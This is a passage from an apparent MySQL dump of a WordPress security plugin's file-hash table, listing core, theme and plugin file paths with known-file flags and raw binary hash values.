�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('ҙ�s�at�����M','wp-content/themes/quicksand/js/lightgallery/img/youtube-play.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3�}��Iɑ�-i','I��!��Vߩ�g�W��	d�ÜF;��{6�','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~ܯ4��v�\0','�W��؀Po�Ep�x�]�%i1~Y\'$��]��U','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҮUzj��DŽ��=�n��','wp-content/themes/advance/js/advance_other.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Q�Y�u','�\"�Jf�]_Y7�(o����d�OX[�d��\0.fG ','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<Ya��g�v��U�C','�K����d�����Sj`ݝ���G�`���#�','',0,'?'),('�ǿ��c��Vc\r�-b��','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�D���ܣ���j','�e��7n�!� f��D\Zh\'�J6SJo�1�','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	��P�{��','',0,'?'),('��AAo���E�Y��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/markdown/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���͞�w�|r�@CkP','�8b��PN_a���vaʪ2���H?�\n�ƭ','',0,'?'),('��/�`]��V#���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/gss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T��1�3�wAr\"�','z�˫��M~��>Ԇ�87\"�,���c\"M�1�','',0,'?'),('��b;��A��ʅ�2','wp-content/themes/metro-magazine/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>-�?�`y��q)c_,z','�+ba��)��t2�4���5�k���y� ���','',0,'?'),('���-Pe�p��iQ�','wp-content/themes/catch-responsive/css/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�ө\n�/;]s>','4�+_�[�������qpv,��{�l������','',0,'?'),('���\\[���i*3�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�Kf�<tv޽{�E','K�TA�ԢF�%\0W�E�7��8�\r�;=��','',0,'?'),('�\n�yڤ�Er����','wp-content/themes/catch-responsive/images/gallery/slider1-1200x514.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q.\n�-�og��p<��','�<�gTg�+[L\0#�Cpʥ�nJ���O:','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('��jY_�k�\n�ճw��','wp-content/themes/graduate/assets/uploads/no-featured-image-1200x500.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���i(=sv?�-�C','M�W��o�%���2LD�\'&@�?KЉ�ڄ�c�#','',0,'?'),('�.tX��尯^:`E��*','wp-content/themes/gambit/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SnA�?եUS��D�V�','兤gyƷʼ����w�Sn��&���r�=�','',0,'?'),('�/��?L\n�����','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/edit/trailingspace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e	[x�Ef�o�@�','����H�!l^����f��Ce��','',0,'?'),('�<ˊ�֊���{έ�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/serialize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R�Mя��\0�T�','��D��~��E4^J1�g�zh�\0~�R$5g�_�','',0,'?'),('�<�\'��b��	*��0','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y������)y1kREX','�_����۪�B��b�k�\Z����Y�H��p�','',0,'?'),('�>��C:T��Hv�1�','wp-content/themes/Kent/FT/js/jquery.minicolors.min.js',0,'\n�-�0��IBg���~','\n�-�0��IBg���~','+�K*�>����^�ƕۏ�f�W�F\rq#��x�','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�I�fB�X�A��6v�','wp-content/themes/exoplanet/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*}��D\rF�PW��X7�','\0�M�v!]/����Gv�K�1�ȃ��ITh��','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'��\'��$W��?�m','��\'��$W��?�m','���MNl�iS�M��\'������/����b C�O:','',0,'?'),('�[�:�S���h	˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa�	#a� ��V','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�~_کk_�l\n��','�vC.z-�N�Y���	�C�<����ccl','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�u1�i|��d��,|��','wp-content/themes/graduate/assets/css/unminified/blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ciO���ď1��f��','�^˔��QYZsUa�p�t���b�	��ӳ�%�','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�܀	���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('�|�UG��+A�\\d�ݜA','wp-content/themes/newsmag/assets/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�u���\Z_Q','��m�q��\\mԋ6�UNm<Yt�v�sI�EP','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F\ZLO�k:�','Z�8��!!�P���8~�\0����e��h','',0,'?'),('ӑuKG(]#-(ٕ�','wp-content/themes/the-best/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qy�b��i�*��Ǔ��','�-vZ\'�g��BJ��;gђ�v����n��%�v','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ��z�����F�&','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����v��K%eb�','���U[p��@��:�Dh�^6�=���ɉ�V���','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�D�P�y��n�\\B�','�AQY��tQ�aK	hˤ�+\r�+�x,`⵽�','',0,'?'),('Ӧ�[ӡ)0b�o\r��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P/U@�L)�=V','��@ow����YNtqW~��e�߇�X^aiH','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('ӿI�<�s�U>&e��\"�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U!#u��TD��5l}','��Hu�r�S��!�㒦\r�r��E��b����','',0,'?'),('��F�aΕ�9s�$O','wp-content/themes/Yegor/404.php',0,'\"��3���8+��枯n','\"��3���8+��枯n','C�c��z���|�Y��F��D�z\'���Wײ#�','',0,'?'),('��H�Z��I��q�1l�','wp-content/themes/graphene/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�NSA\0T�8�	�4','ʋ����@�7�WOtaGU���r�R�*�b��','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('��_��XW~>b��','wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��N�4o�w����','�����C��X���c���L����h�T4jj','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('�梉�t\r*���Qm','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��l~O)1��<�(','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('�w� ���v�M�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	���K$�N�{�E� ','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('�Vn+�c���\Z�','wp-content/themes/edge/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��-#���=;','���T�90�m�y�_�{��?RU���� N','',0,'?'),('�\n@7���蝻\"���G','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�m��z�f������','.�ik�N���ܱ�@�?*Cϲ�Qp��X���*','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�\r/�Z�{�9�����','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zm�F)��]�����','7�b�R�4�S���@����s}�.3��EN','',0,'?'),('�\'J�Xގz֢�)��','wp-content/themes/monograph/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!G<z���rg9h��','��5��9�?ܑ��C������\\��!v�G�','',0,'?'),('�/USU\Z+�.-8sju','wp-content/themes/wp-simple/inc/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��i�#�2�:V','߰-t���:�uq�m��\\�VQ���L\'��G[@�%','',0,'?'),('�<H5�����f�lۑ�','wp-content/themes/event/inc/front-page/upcoming-event.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�W2�qOV4	6\0�U�','�\"|�{�8����ƭ���?�����2�/�','',0,'?'),('�Eb,:I M�&vR�','wp-content/themes/brickyard/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VNv����V!S���','�ix\n������^C�u�i���I��5�}�','',0,'?'),('�Jj�b2�;�D��&�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/gss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T��1�3�wAr\"�','z�˫��M~��>Ԇ�87\"�,���c\"M�1�','',0,'?'),('�T(<��_�#:�?a��','wp-content/themes/authorize/assets/stylesheets/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8L��f��Uٝ','�P�H�>����\"Wz�*�s�����֬�{R�','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� 	<��\r[j�ߕA�m','',0,'?'),('�m��;>�,R�ߨˆ','wp-content/themes/authorize/inc/widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �\'j��Pl4��\r','9n=�\\��S�]�\rE�X����F6O�{��','',0,'?'),('Ԇ�p����!K\'�g�','wp-content/themes/Yegor/FT/FT_scope.php',0,'㉃�q�B3v��u.��','㉃�q�B3v��u.��','�h��G+L�&\'AG-G2�n~�H�\rh���','',0,'?'),('Ԋ�\0T,��`��G��','wp-content/themes/advance/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#i�-J�9�;�Yn��V','\\o��Ԁ3o��F��0fg[\r�x8ȵ�E��oc','',0,'?'),('Ԍ��ydDw��\rN�','wp-content/themes/saybusiness/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$s~	�=�~^�m','���e*p�6��[���_���rI\0P��-','',0,'?'),('Ԕ\r��\r�����^�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lԍ����Z��2gu','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('Կ���b�4��p{�?','wp-content/themes/wp-simple/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t/l9�U*�\\�d','?I�F�1��pN��+��Y5��\'-�A~�1��^','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I	���g\0�����a�B','',0,'?'),('��ԕ$=�Qh�l���','wp-content/themes/the-best/images/header2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�\"�/f���GƤV,�','�mۨLR�貼��5��Laht��x��_.&.<','',0,'?'),('��=�S�a/0O\"㐏S�','wp-content/themes/advance/inc/kirki/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�]�\n$�`cz~��','��5F���Si� ^ ��Z~�D�&�In����','',0,'?'),('��?�`��XL��f','wp-content/themes/event/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��3��m��ď��<',']��xp�8�X�uEwa[�=�;��Z�p���2�','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('��lq����\r/R�E','wp-content/themes/graduate/inc/customizer/upgrade-to-pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�#����V','���$��>^��\"ʳ�&�м�5W�`A��','',0,'?'),('��`l���S�,�\"�h','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';6����b�ؑ��jz\'R','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('��L��N�|���9�','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/visited.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n���d7w�H��','{��z�9�X�\Z�RKf������衔����','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('�\Z3	b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�{�`\\�iqDY���','wp-content/themes/catch-responsive/js/source/catchresponsive-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r<U��Y�\Z��/�j','c�2���0ꡳ)����w<C8f��Q�;�sм','',0,'?'),('��2B��4��Y1','wp-content/themes/newsmag/assets/vendors/machothemes/components/sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`����h.NQW�	S','!�;�}�Τ�\'���期���s��=�bQ�','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�\'����c�\n`�','wp-content/themes/gambit/inc/addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ֶq�f���j��K','��˹x����8Eid,V�y�}��7�5�+����6','',0,'?'),('�.���ޒ.��=�����','wp-content/themes/brickyard/docs/assets/images/img2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���i���}sM�','\r�^��Ő�b�5�s3����I�U���~o�m','',0,'?'),('�9�,Mt1S��ӭ�V�','wp-content/themes/gambit/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nBI݂\'��o�\n,��','%�8o�D[�]M�]��X+�J7�]�[�z','',0,'?'),('�;�[)֩�LxG<�&+','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/mbo.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˑ��%a�y/ti����','C\n��=�ZZ�D�\n[����\0��-�}w�L','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j�	','',0,'?'),('�_��\\��dg�;�d�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� ̮&�L,B�9','�7w�1V�������ҧU���NNmP�r0���N','',0,'?'),('�d��@P�pW���o','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o�J�m��E��','}[�V	d���\0��)�Ц��Cy\n��8�?\Z��ZY','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8;����2��/���G','�e\\���%��`#J˘��\n��Ú�n��̭7�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţ%	\Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('Ն/�F�>dd�Gm�','wp-content/themes/Endolf/inc/category-news-widget.php',0,'v� (c.�jD7��$�','v� (c.�jD7��$�','s6�qSa�8�8�,_G�z��|(�˱ +y��P','',0,'?'),('Շ��F�\Z�E����<','wp-content/themes/monograph/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�-�5\\����','.L���h����d:�i�Ҡ^a��\\�qb','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('յ0�\re�6b:��Q&��','wp-content/themes/newsmag/assets/sass/modules/_breadcrumbs.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']z2�e.�k���-�','���Q���ׄjN���&Vie\'�l���0�r��','',0,'?'),('��>����Z��|�e͹','wp-content/themes/metro-magazine/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('�mݣ���Γ�`?|!','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lu�Gn����/;k5,W','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('��ɛ;k�߈A��','wp-content/themes/simpleshift/assets/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�z` w�2�fPH��','��1���J�u�{Y[���!6QFh�84^�w�','',0,'?'),('����|O��+>','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ambiance.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��G�(m���Q','�w\n=�Ǐw�+��I?��ʍ\"p	�W��','',0,'?'),('��}��m��Wd,���','wp-content/themes/weblog/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1}�͈��(�p��VKu','f���r���Kv{e��B�n�4t��q^d�\'','',0,'?'),('�)�#X!ɠ��(b]�','wp-content/themes/graphene/images/social/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<}��5�f��+�b','#0��T�0�x�s��_�z$�ftU��fL}ɿz','',0,'?'),('�5�@���T��H�`�','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��蔿�n����g���','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('�;�Wg��o�*}�k','wp-content/themes/authorize/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.<r%4x�J��@�','��K�zbb��ߎM�##6C�i31�� Ժ6P�','',0,'?'),('�K9�\'���\r�H<���','wp-content/themes/advance/inc/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�Z���V�b�We�','W\nk����`ֻ��`�]4�����W:>�B7�','',0,'?'),('�K�М?���Qdӛ]&','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�{\r�֒����5','5j��\ZC̀M�Oò6��>��MXHH�i�A','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�a��ƙH�b���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sass/sass.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�p�W��x�+���','TnLf�h+�֕c(b;��TzJ/�c%����@','',0,'?'),('�ml:|*_��)m���','wp-content/themes/wp-simple/assets/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%3���-�d/�f��','ĥѐ�]�\Z\'z| *l-ʭz���<�Y@E�u�','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�x���[�_��:۶','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xIu�3�x���L�Q','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('�~S-�Q�S?�~���','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7&Z-�榞٩���\n}','�\ZJ�l�( j�gix����u�߳Z','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s	